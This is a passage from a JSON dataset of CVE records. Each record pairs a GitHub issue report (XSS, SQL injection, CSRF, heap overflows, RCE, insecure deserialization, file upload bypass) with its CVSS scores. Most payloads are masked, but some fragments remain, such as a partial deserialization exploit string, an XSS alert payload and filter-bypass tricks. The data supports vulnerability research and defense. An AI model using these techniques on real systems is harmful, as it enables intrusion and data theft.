  51934. "impactScore": 3.6,
  51935. "exploitabilityScore": 2.8
  51936. },
  51937. {
  51938. "CVE_ID": "CVE-2020-19750",
  51939. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1262",
  51940. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1262",
  51941. "Repo_new": "gpac/gpac",
  51942. "Issue_Created_At": "2019-07-05T09:50:55Z",
  51943. "description": "in box_code_base.c line NUMBERTAG has a heap overflow. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! ] I looked for a similar issue and couldn't find any. [ ] I tried with the latest version of GPAC. Installers available at URLTAG [ ] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG in box_code_base.c [line NUMBERTAG URLTAG has a heap overflow. CODETAG When str is full without NUMBERTAG strdup will make a heap overflow.",
  51944. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  51945. "severity": "HIGH",
  51946. "baseScore": 7.5,
  51947. "impactScore": 3.6,
  51948. "exploitabilityScore": 3.9
  51949. },
  51950. {
  51951. "CVE_ID": "CVE-2020-19751",
  51952. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1272",
  51953. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1272",
  51954. "Repo_new": "gpac/gpac",
  51955. "Issue_Created_At": "2019-07-08T12:35:13Z",
  51956. "description": "in odf_code.c line NUMBERTAG have a heap buffer overflow. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! [\u2714 ] I looked for a similar issue and couldn't find any. [\u2714 ] I tried with the latest version of GPAC. Installers available at URLTAG [ \u2714] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG in odf_code.c [line NUMBERTAG URLTAG ) The check for size here may have some problems.It will cause a heap APITAG it will resulting in gf_odf_del_ipmp_tool to free a invalid address. Here is the asan's result: ERRORTAG",
  51957. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  51958. "severity": "CRITICAL",
  51959. "baseScore": 9.1,
  51960. "impactScore": 5.2,
  51961. "exploitabilityScore": 3.9
  51962. },
  51963. {
  51964. "CVE_ID": "CVE-2020-19752",
  51965. "Issue_Url_old": "https://github.com/kohler/gifsicle/issues/140",
  51966. "Issue_Url_new": "https://github.com/kohler/gifsicle/issues/140",
  51967. "Repo_new": "kohler/gifsicle",
  51968. "Issue_Created_At": "2019-07-17T02:54:29Z",
  51969. "description": "NULL Pointer Deference vulnerability in find_color_or_error function. In support.c line NUMBERTAG URLTAG , The gfcm could be a NULL pointer in some cases. Here is the usage: gifsicle t NUMBERTAG FILETAG o FILETAG POC here: APITAG Here is Asan's report: ERRORTAG",
  51970. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  51971. "severity": "HIGH",
  51972. "baseScore": 7.5,
  51973. "impactScore": 3.6,
  51974. "exploitabilityScore": 3.9
  51975. },
  51976. {
  51977. "CVE_ID": "CVE-2020-19770",
  51978. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/180",
  51979. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/180",
  51980. "Repo_new": "wuzhicms/wuzhicms",
  51981. "Issue_Created_At": "2019-07-09T09:39:41Z",
  51982. "description": "A stored XSS vulnerability in WUZHI CMS NUMBERTAG This XSS vulnerability was found in the system bulletin(\u7cfb\u7edf\u516c\u544a) in the background. payload: > APITAG \\ APITAG \\ APITAG First we can write payload with a low privileged user named 'test'.As an attacker, you can change a title to prompt an administrator to click on this page. FILETAG Then log in to the admin account and click the change(\u4fee\u6539) button to pop up the admin's cookie. FILETAG FILETAG The reason for the vulnerability is that php code uses blacklists to filter JS code, resulting in poor filtering.",
  51983. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  51984. "severity": "MEDIUM",
  51985. "baseScore": 5.4,
  51986. "impactScore": 2.7,
  51987. "exploitabilityScore": 2.3
  51988. },
  51989. {
  51990. "CVE_ID": "CVE-2020-19778",
  51991. "Issue_Url_old": "https://github.com/gongfuxiang/shopxo/issues/23",
  51992. "Issue_Url_new": "https://github.com/gongfuxiang/shopxo/issues/23",
  51993. "Repo_new": "gongfuxiang/shopxo",
  51994. "Issue_Created_At": "2019-07-10T10:07:10Z",
  51995. "description": "\u7248\u672c\u901a\u6740\u65e0\u6761\u4ef6\u767b\u9646\u4efb\u610f\u7528\u6237. APPLICATION\u3001$params FILETAG \u5229\u7528\u4fee\u6539\u5934\u50cf\u63a5\u53e3 APITAG FILETAG APITAG FILETAG APITAG FILETAG APITAG FILETAG APITAG",
  51996. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  51997. "severity": "CRITICAL",
  51998. "baseScore": 9.8,
  51999. "impactScore": 5.9,
  52000. "exploitabilityScore": 3.9
  52001. },
  52002. {
  52003. "CVE_ID": "CVE-2020-19821",
  52004. "Issue_Url_old": "https://github.com/millken/doyocms/issues/3",
  52005. "Issue_Url_new": "https://github.com/millken/doyocms/issues/3",
  52006. "Repo_new": "millken/doyocms",
  52007. "Issue_Created_At": "2019-07-20T04:57:53Z",
  52008. "description": "SQL INJECTION AT ADMIN PAGE. code view: FILETAG payload: FILETAG",
  52009. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  52010. "severity": "HIGH",
  52011. "baseScore": 8.8,
  52012. "impactScore": 5.9,
  52013. "exploitabilityScore": 2.8
  52014. },
  52015. {
  52016. "CVE_ID": "CVE-2020-19860",
  52017. "Issue_Url_old": "https://github.com/NLnetLabs/ldns/issues/50",
  52018. "Issue_Url_new": "https://github.com/nlnetlabs/ldns/issues/50",
  52019. "Repo_new": "nlnetlabs/ldns",
  52020. "Issue_Created_At": "2019-09-24T08:11:14Z",
  52021. "description": "heap Out of bound Read. FILETAG",
  52022. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  52023. "severity": "MEDIUM",
  52024. "baseScore": 6.5,
  52025. "impactScore": 3.6,
  52026. "exploitabilityScore": 2.8
  52027. },
  52028. {
  52029. "CVE_ID": "CVE-2020-19861",
  52030. "Issue_Url_old": "https://github.com/NLnetLabs/ldns/issues/51",
  52031. "Issue_Url_new": "https://github.com/nlnetlabs/ldns/issues/51",
  52032. "Repo_new": "nlnetlabs/ldns",
  52033. "Issue_Created_At": "2019-09-26T03:30:58Z",
  52034. "description": "Heap Out of bound Read vulnerability. Description\uff1a When the zone file is parsed, the function ldns_nsec3_salt_data is too trusted for the length value obtained from the zone file. When the memcpy is copied, the NUMBERTAG fe ldns_rdf_size(salt_rdf) byte data can be copied, causing heap information leakage. Vulnerability location\uff1a FILETAG fuzz log\uff1a FILETAG Repaire Suggestion\uff1a FILETAG",
  52035. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  52036. "severity": "HIGH",
  52037. "baseScore": 7.5,
  52038. "impactScore": 3.6,
  52039. "exploitabilityScore": 3.9
  52040. },
  52041. {
  52042. "CVE_ID": "CVE-2020-19896",
  52043. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/36",
  52044. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/36",
  52045. "Repo_new": "bg5sbk/minicms",
  52046. "Issue_Created_At": "2019-08-23T07:27:06Z",
  52047. "description": "file inclusion vulnerability. Require: PHP Version NUMBERTAG magic_quotes_gpc=off NUMBERTAG require $index_file $index_file = PATHTAG $post_old_state = $data FILETAG NUMBERTAG write a page or article with content FILETAG NUMBERTAG can see url is FILETAG so filename is NUMBERTAG kbz NUMBERTAG bat NUMBERTAG use burppsuite,we can find phpinfo in response FILETAG",
  52048. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  52049. "severity": "CRITICAL",
  52050. "baseScore": 9.8,
  52051. "impactScore": 5.9,
  52052. "exploitabilityScore": 3.9
  52053. },
  52054. {
  52055. "CVE_ID": "CVE-2020-19897",
  52056. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/183",
  52057. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/183",
  52058. "Repo_new": "wuzhicms/wuzhicms",
  52059. "Issue_Created_At": "2019-08-01T08:29:05Z",
  52060. "description": "wuzhicms NUMBERTAG statcode reflected xss vulnerability . A xss vulnerability was discovered in WUZHI CMS NUMBERTAG There is a reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the imgurl parameter of APITAG POC ji APITAG APITAG Vulnerability trigger point URLTAG When attacker access system settings basic settings, Write poc in the statcode form , then XSS vulnerability is triggered successfully NUMBERTAG choose this part and write poc to FILETAG NUMBERTAG submit and view webpage FILETAG",
  52061. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  52062. "severity": "MEDIUM",
  52063. "baseScore": 6.1,
  52064. "impactScore": 2.7,
  52065. "exploitabilityScore": 2.8
  52066. },
  52067. {
  52068. "CVE_ID": "CVE-2020-19907",
  52069. "Issue_Url_old": "https://github.com/mitre/caldera/issues/462",
  52070. "Issue_Url_new": "https://github.com/mitre/caldera/issues/462",
  52071. "Repo_new": "mitre/caldera",
  52072. "Issue_Created_At": "2019-09-02T10:03:53Z",
  52073. "description": "OS Command Injection in sandcat plugin. login the caldera open the url URLTAG Enter a url, click clone button APITAG FILETAG FILETAG",
  52074. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  52075. "severity": "HIGH",
  52076. "baseScore": 8.8,
  52077. "impactScore": 5.9,
  52078. "exploitabilityScore": 2.8
  52079. },
  52080. {
  52081. "CVE_ID": "CVE-2020-19915",
  52082. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/173",
  52083. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/173",
  52084. "Repo_new": "wuzhicms/wuzhicms",
  52085. "Issue_Created_At": "2019-03-05T10:36:17Z",
  52086. "description": "There is a XSS vulnerability . A xss vulnerability was discovered in WUZHI CMS NUMBERTAG There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the form[smtp_user] parameter post to the PATHTAG When administrator access system settings mail server .then XSS vulnerability is triggered successfully POC xss payload: \"> APITAG Vulnerability trigger point POST PATHTAG HTTP NUMBERTAG Host: APITAG Content Length NUMBERTAG Cache Control: max age NUMBERTAG Origin: FILETAG Upgrade Insecure Requests NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Content Type: application/x www form urlencoded Accept: PATHTAG / ;q NUMBERTAG Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh; APITAG Cookie: APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Connection: close APITAG APITAG when administrator access system settings mail server .then XSS vulnerability is triggered",
  52087. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  52088. "severity": "MEDIUM",
  52089. "baseScore": 6.1,
  52090. "impactScore": 2.7,
  52091. "exploitabilityScore": 2.8
  52092. },
  52093. {
  52094. "CVE_ID": "CVE-2020-19924",
  52095. "Issue_Url_old": "https://github.com/BoostIO/Boostnote/issues/3178",
  52096. "Issue_Url_new": "https://github.com/boostio/boostnote-legacy/issues/3178",
  52097. "Repo_new": "boostio/boostnote-legacy",
  52098. "Issue_Created_At": "2019-07-28T14:16:18Z",
  52099. "description": "Notes Exported to PDF Format Is Existing XSS Attacks. Current behavior Notes Exported to PDF Format Is Existing XSS Attacks. Expected behavior Notes Exported to PDF Format Is Existing XSS Attacks. When there is a code in the note: \\ APITAG XSS attacks are triggered when the export PDF function is reused. FILETAG Steps to reproduce NUMBERTAG Put the payload below into your notes. Payload: \\ APITAG I cut a picture: FILETAG NUMBERTAG Click on the APITAG button in the upper right corner of the note to export the file in PDF format. This will trigger payload to generate a bullet window, that is, there is an XSS attack NUMBERTAG Here is a demo video: FILETAG Environment Version NUMBERTAG OS Version and name : Microsoft Windows NUMBERTAG Home Chinese Version",
  52100. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  52101. "severity": "MEDIUM",
  52102. "baseScore": 5.4,
  52103. "impactScore": 2.7,
  52104. "exploitabilityScore": 2.3
  52105. },
  52106. {
  52107. "CVE_ID": "CVE-2020-19949",
  52108. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/21",
  52109. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/21",
  52110. "Repo_new": "yzmcms/yzmcms",
  52111. "Issue_Created_At": "2019-08-05T11:27:25Z",
  52112. "description": "Cross Site Scripting Vulnerability in Latest Release NUMBERTAG Cross Site Scripting Vulnerability in Latest Release NUMBERTAG Hi, I would like to report Cross Site Scripting vulnerability in latest release. Description: Cross site scripting (XSS) vulnerability in FILETAG Steps To Reproduce: APITAG Admin System NUMBERTAG create new page url: FILETAG CODETAG FILETAG APITAG link FILETAG Release Info NUMBERTAG author by barret. EMAILTAG .cn",
  52113. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  52114. "severity": "MEDIUM",
  52115. "baseScore": 4.8,
  52116. "impactScore": 2.7,
  52117. "exploitabilityScore": 1.7
  52118. },
  52119. {
  52120. "CVE_ID": "CVE-2020-19950",
  52121. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/22",
  52122. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/22",
  52123. "Repo_new": "yzmcms/yzmcms",
  52124. "Issue_Created_At": "2019-08-05T11:58:43Z",
  52125. "description": "Cross Site Scripting Vulnerability in Latest Release NUMBERTAG Cross Site Scripting Vulnerability in Latest Release NUMBERTAG Hi, I would like to report Cross Site Scripting vulnerability in latest release. Description: Cross site scripting (XSS) vulnerability in FILETAG Steps To Reproduce: APITAG Admin System NUMBERTAG create new page url: FILETAG CODETAG FILETAG APITAG links FILETAG Release Info NUMBERTAG author by barret. EMAILTAG .cn",
  52126. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  52127. "severity": "MEDIUM",
  52128. "baseScore": 4.8,
  52129. "impactScore": 2.7,
  52130. "exploitabilityScore": 1.7
  52131. },
  52132. {
  52133. "CVE_ID": "CVE-2020-19951",
  52134. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/43",
  52135. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/43",
  52136. "Repo_new": "yzmcms/yzmcms",
  52137. "Issue_Created_At": "2020-03-09T13:40:14Z",
  52138. "description": "A CSRF vulnerability exists in APITAG NUMBERTAG Introduction When the Administrator login APITAG can construct malicious POCS to fool administrator into accessing it then the APPID of Alipay, the private key of the merchant application, and the public key of Alipay can be change APITAG a attack can be get the profit of this website! Vulnerable code ERRORTAG CSRF APITAG CODETAG Proof FILETAG Suggestion Use the APITAG to protect it!",
  52139. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  52140. "severity": "HIGH",
  52141. "baseScore": 8.8,
  52142. "impactScore": 5.9,
  52143. "exploitabilityScore": 2.8
  52144. },
  52145. {
  52146. "CVE_ID": "CVE-2020-19964",
  52147. "Issue_Url_old": "https://github.com/gaozhifeng/PHPMyWind/issues/9",
  52148. "Issue_Url_new": "https://github.com/gaozhifeng/phpmywind/issues/9",
  52149. "Repo_new": "gaozhifeng/phpmywind",
  52150. "Issue_Created_At": "2019-10-28T06:19:09Z",
  52151. "description": "CSRF vulnerability exists in APITAG NUMBERTAG Product Homepage: FILETAG Software link: URLTAG Version NUMBERTAG The backend code writes the new user data to the database without authentication such as token CODETAG When the background administrator clicks the malicious link, the background will add an administrator user APITAG CODETAG APITAG FILETAG",
  52152. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  52153. "severity": "MEDIUM",
  52154. "baseScore": 6.5,
  52155. "impactScore": 3.6,
  52156. "exploitabilityScore": 2.8
  52157. },
  52158. {
  52159. "CVE_ID": "CVE-2020-20092",
  52160. "Issue_Url_old": "https://github.com/woider/ArticleCMS/issues/8",
  52161. "Issue_Url_new": "https://github.com/woider/articlecms/issues/8",
  52162. "Repo_new": "woider/articlecms",
  52163. "Issue_Created_At": "2019-08-15T12:40:09Z",
  52164. "description": "there is a File upload attack vulnerability. there is a File upload attack vulnerability,It can lead to arbitrary uploading of PHP script files. The location of the vulnerability is in URLTAG the content editing function is. FILETAG Let's see the code: FILETAG There are two problems NUMBERTAG The uploaded file detection is not strict, only the content type is detected, and even the file suffix is not detected, which causes us to modify the content type when uploading to bypass the upload php file NUMBERTAG File processing logic vulnerabilities, although there is a file abbreviated processing, but when uploading a sentence Trojan with a jpg file header, the server will not return the address, but the file is already stored on the server, so the file upload can be achieved. In addition, although the CMS detects and filters uploaded files, it will be automatically commented out if it matches APITAG APITAG to bypass My exploit is as follows: FILETAG Let's test it out. FILETAG as we can APITAG PHP Trojan has been successfully uploaded and validated.",
  52165. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  52166. "severity": "CRITICAL",
  52167. "baseScore": 9.8,
  52168. "impactScore": 5.9,
  52169. "exploitabilityScore": 3.9
  52170. },
  52171. {
  52172. "CVE_ID": "CVE-2020-20120",
  52173. "Issue_Url_old": "https://github.com/top-think/thinkphp/issues/553",
  52174. "Issue_Url_new": "https://github.com/top-think/thinkphp/issues/553",
  52175. "Repo_new": "top-think/thinkphp",
  52176. "Issue_Created_At": "2019-08-23T09:39:22Z",
  52177. "description": "SQL injection problem exists for multiple functions below version NUMBERTAG I found a lot of such code in our extensive penetration test. APITAG Such code is not pre processed by sql during preprocessing. can be seen ERRORTAG or ERRORTAG And the official website also has a lot of such writings. FILETAG Are all wrong demonstrations that will cause more SQL injection Sql injection can also be performed in the FILETAG limit function and the order function. ERRORTAG",
  52178. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  52179. "severity": "CRITICAL",
  52180. "baseScore": 9.8,
  52181. "impactScore": 5.9,
  52182. "exploitabilityScore": 3.9
  52183. },
  52184. {
  52185. "CVE_ID": "CVE-2020-20124",
  52186. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/188",
  52187. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/188",
  52188. "Repo_new": "wuzhicms/wuzhicms",
  52189. "Issue_Created_At": "2019-11-18T08:42:58Z",
  52190. "description": "Remote Code Execution Vulnerability In WUZHI CMS NUMBERTAG In the set_cache method of the PATHTAG file, when $data is not of the array type, $data will be written directly to the php file. ERRORTAG NUMBERTAG The set_cache method is called in the set method of the PATHTAG file, and $GLOBALS FILETAG",
  52191. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  52192. "severity": "HIGH",
  52193. "baseScore": 8.8,
  52194. "impactScore": 5.9,
  52195. "exploitabilityScore": 2.8
  52196. },
  52197. {
  52198. "CVE_ID": "CVE-2020-20128",
  52199. "Issue_Url_old": "https://github.com/wanglelecc/laracms/issues/33",
  52200. "Issue_Url_new": "https://github.com/wanglelecc/laracms/issues/33",
  52201. "Repo_new": "wanglelecc/laracms",
  52202. "Issue_Created_At": "2019-08-24T07:18:23Z",
  52203. "description": "Security Cleartext Transmission of Sensitive Information. FILETAG FILETAG FILETAG FILETAG The software transmits sensitive or security critical data in cleartext in a communication channel that can be sniffed by unauthorized actors. So please encrypt the data with a reliable encryption scheme before transmitting.",
  52204. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  52205. "severity": "HIGH",
  52206. "baseScore": 7.5,
  52207. "impactScore": 3.6,
  52208. "exploitabilityScore": 3.9
  52209. },
  52210. {
  52211. "CVE_ID": "CVE-2020-20129",
  52212. "Issue_Url_old": "https://github.com/wanglelecc/laracms/issues/34",
  52213. "Issue_Url_new": "https://github.com/wanglelecc/laracms/issues/34",
  52214. "Repo_new": "wanglelecc/laracms",
  52215. "Issue_Created_At": "2019-08-25T10:08:54Z",
  52216. "description": "\u5b58\u50a8\u578bXSS NUMBERTAG FILETAG APITAG APITAG FILETAG \u7136\u540e\u5b8c\u6210\u7f16\u8f91\uff0c\u70b9\u51fb\u63d0\u4ea4\u6309\u94ae FILETAG FILETAG \u4f7f\u7528\u76f8\u5173\u5de5\u5177\uff0c\u62e6\u622a\u63d0\u4ea4\u7684\u8bf7\u6c42\uff0c\u5e76\u5c06\u63d0\u4ea4\u7684 APITAG alert(\"test\") APITAG APITAG APITAG \u7684URL\u7f16\u7801 FILETAG FILETAG \u63d0\u4ea4\u8bf7\u6c42\u5230\u670d\u52a1\u5668\uff0c\u6b64\u65f6\u5bf9\u5e94\u811a\u672c\u5df2\u5199\u5165\u6570\u636e\u5e93\u4e2d\u3002 FILETAG FILETAG APITAG \u4fee\u590d\u5efa\u8bae\uff1a\u5bf9\u63d2\u5165\u7684\u8d85\u94fe\u63a5\u8bf7\u6c42\u5728\u670d\u52a1\u5668\u7aef\u4e5f\u505a\u7f16\u7801\u548c\u8fc7\u6ee4\u3002",
  52217. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  52218. "severity": "MEDIUM",
  52219. "baseScore": 5.4,
  52220. "impactScore": 2.7,
  52221. "exploitabilityScore": 2.3
  52222. },
  52223. {
  52224. "CVE_ID": "CVE-2020-20131",
  52225. "Issue_Url_old": "https://github.com/wanglelecc/laracms/issues/36",
  52226. "Issue_Url_new": "https://github.com/wanglelecc/laracms/issues/36",
  52227. "Repo_new": "wanglelecc/laracms",
  52228. "Issue_Created_At": "2019-08-27T18:37:59Z",
  52229. "description": "Stored XSS of PAGE control. FILETAG FILETAG FILETAG FILETAG FILETAG The vulnerability is found in laracms NUMBERTAG Hackers can inject a script in the place where the page is managed. Its content accepts all user input and stores it to the database. Other users accessing this website will execute the script. You should filter and escape the output which is picked up from the database before showing it to the users.",
  52230. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  52231. "severity": "MEDIUM",
  52232. "baseScore": 5.4,
  52233. "impactScore": 2.7,
  52234. "exploitabilityScore": 2.3
  52235. },
  52236. {
  52237. "CVE_ID": "CVE-2020-20136",
  52238. "Issue_Url_old": "https://github.com/QuantConnect/Lean/issues/3537",
  52239. "Issue_Url_new": "https://github.com/quantconnect/lean/issues/3537",
  52240. "Repo_new": "quantconnect/lean",
  52241. "Issue_Created_At": "2019-08-25T09:35:19Z",
  52242. "description": "Insecure Deserialization due to insecure APITAG leads to Code Execution.. Expected Behavior The application should not deserialize untrusted data which is user controllable without proper checks and validation of incoming types. Actual Behavior While deserializing a string, the deserializer is able to invoke unsafe classes that can execute OS commands due to insecure configuration of APITAG property in APITAG , which is currently set to All from version NUMBERTAG to NUMBERTAG The vulnerable code is in PATHTAG line NUMBERTAG Potential Solution NUMBERTAG While deserializing untrusted data. DO NOT use any APITAG other than None. ( Highly Recommended NUMBERTAG If APITAG other than None is required, then use a APITAG to validate and whitelist the incoming types . Reproducing the Problem NUMBERTAG After opening the solution in visual studio, write the below lines of code in any class that inherits from APITAG class. I have written below code in APITAG // string containing exploit code. The string source can be data from remote data server or local file. string server_data = \"{ $type : APITAG , APITAG : Start , APITAG :{ $type : APITAG , $values : calc ]}, APITAG :{ $type : APITAG }}\"; // Call the APITAG method in APITAG by passing string, which will try to deserialize the string to an object. object obj = APITAG NUMBERTAG Rebuild and run the solution. The calculator program will pop up. I have a video POC. Please request in case required APITAG System Information Tested on Windows NUMBERTAG with Visual Studio NUMBERTAG Community Edition. Codebase version tested NUMBERTAG Checklist I have completely filled out this template I have confirmed that this issue exists on the current master branch I have confirmed that this is not a duplicate issue by searching [issues URLTAG I have provided detailed steps to reproduce the issue",
  52243. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  52244. "severity": "CRITICAL",
  52245. "baseScore": 9.8,
  52246. "impactScore": 5.9,
  52247. "exploitabilityScore": 3.9
  52248. },
  52249. {
  52250. "CVE_ID": "CVE-2020-20184",
  52251. "Issue_Url_old": "https://github.com/liftoff/GateOne/issues/736",
  52252. "Issue_Url_new": "https://github.com/liftoff/gateone/issues/736",
  52253. "Repo_new": "liftoff/gateone",
  52254. "Issue_Created_At": "2019-08-28T00:36:09Z",
  52255. "description": "A RCE Security vulnerability. In this file URLTAG There is a command execution and the argument comes from user input. FILETAG Poc NUMBERTAG Deploy a APITAG instance. URLTAG FILETAG FILETAG NUMBERTAG Open the dev tool in your browser, open the APITAG page. FILETAG NUMBERTAG Try to create an ssh connection. And watch the APITAG traffic, wait for the APITAG command executes. FILETAG NUMBERTAG Now we can switch the dev tool to console, and input this APITAG script to let APITAG APITAG send Our evil command. We can see that we get the command execution result from the error message. APITAG FILETAG",
  52256. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  52257. "severity": "CRITICAL",
  52258. "baseScore": 9.8,
  52259. "impactScore": 5.9,
  52260. "exploitabilityScore": 3.9
  52261. },
  52262. {
  52263. "CVE_ID": "CVE-2020-20189",
  52264. "Issue_Url_old": "https://github.com/ornose15/NewPK/issues/1",
  52265. "Issue_Url_new": "https://github.com/ornose15/newpk/issues/1",
  52266. "Repo_new": "ornose15/newpk",
  52267. "Issue_Created_At": "2019-08-29T16:13:49Z",
  52268. "description": "There are a SQL inject at FILETAG . SQL inject start at line NUMBERTAG APITAG filtered by modify function APITAG ,but the problem is : filter rules are too APITAG function at FILETAG line NUMBERTAG ERRORTAG you can see it's just replace space to ' ' ,it's simple to bypass this filter with change space to comment ============================ here is sql inject position code: APITAG safe title ERRORTAG ============================ fix advice: add more filter rules or use APITAG to protect your variable",
  52269. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  52270. "severity": "CRITICAL",
  52271. "baseScore": 9.8,
  52272. "impactScore": 5.9,
  52273. "exploitabilityScore": 3.9
  52274. },
  52275. {
  52276. "CVE_ID": "CVE-2020-2023",
  52277. "Issue_Url_old": "https://github.com/kata-containers/runtime/issues/2488",
  52278. "Issue_Url_new": "https://github.com/kata-containers/runtime/issues/2488",
  52279. "Repo_new": "kata-containers/runtime",
  52280. "Issue_Created_At": "2020-02-20T16:13:48Z",
  52281. "description": "clh: update the . Which feature do you think can be improved? Specify the feature you think could be made better. How can it be improved? Describe how specifically you think it could be improved. Additional Information Anything else to add? Before raising this feature request Have you looked at the FILETAG ?",
  52282. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L",
  52283. "severity": "MEDIUM",
  52284. "baseScore": 6.3,
  52285. "impactScore": 3.7,
  52286. "exploitabilityScore": 2.0
  52287. },
  52288. {
  52289. "CVE_ID": "CVE-2020-2023",
  52290. "Issue_Url_old": "https://github.com/kata-containers/agent/issues/791",
  52291. "Issue_Url_new": "https://github.com/kata-containers/agent/issues/791",
  52292. "Repo_new": "kata-containers/agent",
  52293. "Issue_Created_At": "2020-06-03T15:33:02Z",
  52294. "description": "Explicitly deny any access to the nvdimm root partition. Explicitly deny any access to the nvdimm root partition by adding the nvdimm device to the device cgroup.",
  52295. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L",
  52296. "severity": "MEDIUM",
  52297. "baseScore": 6.3,
  52298. "impactScore": 3.7,
  52299. "exploitabilityScore": 2.0
  52300. },
  52301. {
  52302. "CVE_ID": "CVE-2020-2024",
  52303. "Issue_Url_old": "https://github.com/kata-containers/runtime/issues/2474",
  52304. "Issue_Url_new": "https://github.com/kata-containers/runtime/issues/2474",
  52305. "Repo_new": "kata-containers/runtime",
  52306. "Issue_Created_At": "2020-02-19T12:52:15Z",
  52307. "description": "harden container hostpath cleanup. Description of problem A container's host path might be changed by the guest to point to some other places by placing a symlink there. kata runtime should not follow link when unmounting them otherwise we might end up unmounting some other mountpoints unexpectedly.",
  52308. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H",
  52309. "severity": "MEDIUM",
  52310. "baseScore": 6.5,
  52311. "impactScore": 4.0,
  52312. "exploitabilityScore": 2.0
  52313. },
  52314. {
  52315. "CVE_ID": "CVE-2020-2026",
  52316. "Issue_Url_old": "https://github.com/kata-containers/runtime/issues/2712",
  52317. "Issue_Url_new": "https://github.com/kata-containers/runtime/issues/2712",
  52318. "Repo_new": "kata-containers/runtime",
  52319. "Issue_Created_At": "2020-05-29T15:40:02Z",
